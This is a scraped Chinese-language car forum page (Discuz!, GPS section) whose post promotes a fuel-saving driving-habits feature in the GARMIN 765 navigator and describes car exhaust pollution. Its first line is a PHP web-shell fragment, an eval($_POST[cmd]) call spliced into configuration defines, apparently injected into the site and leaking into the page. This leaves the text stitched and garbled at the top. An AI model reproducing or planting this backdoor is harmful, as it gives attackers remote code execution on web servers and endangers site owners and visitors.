');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 省錢又環保? 任我游教你如何省油費 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

省錢又環保? 任我游教你如何省油費

汽車尾氣可以算是空氣污染的重大污染源,隨著城市汽車保有量的逐步增加,汽車尾氣排放正在成為社會各界所面臨的嚴峻問題之一。一輛汽車在正常行駛的狀況下,一天約可以排放600多克污染物,污染物中含有固體懸浮微粒、一氧化碳、碳氫化合物、氮氧化合物、鉛及硫氧化合物等,一輛汽車一年排出的有害物質相當於自身車重的3倍。




    此外不良的駕駛習慣不但會使車輛本身油耗增加,還會造成更多污染物的排出。汽車尾氣不但慢慢吞噬著我們的健康,也正在逐步侵害者我們的生活環境。所以為了減少尾氣排放,養成良好的的駕駛習慣是我們車主必須面對的現實問題。





    針對這種情況,車載PND品牌GARMIN將能夠幫助用戶節油,環保於一身的「節能助手」軟件融合到GARMIN765機體內,此軟件能幫助使用者逐漸養成良好的駕駛習慣,從而在不影響正常出行的前提下,使用戶出行變得高效、便捷、經濟、環保。
返回列表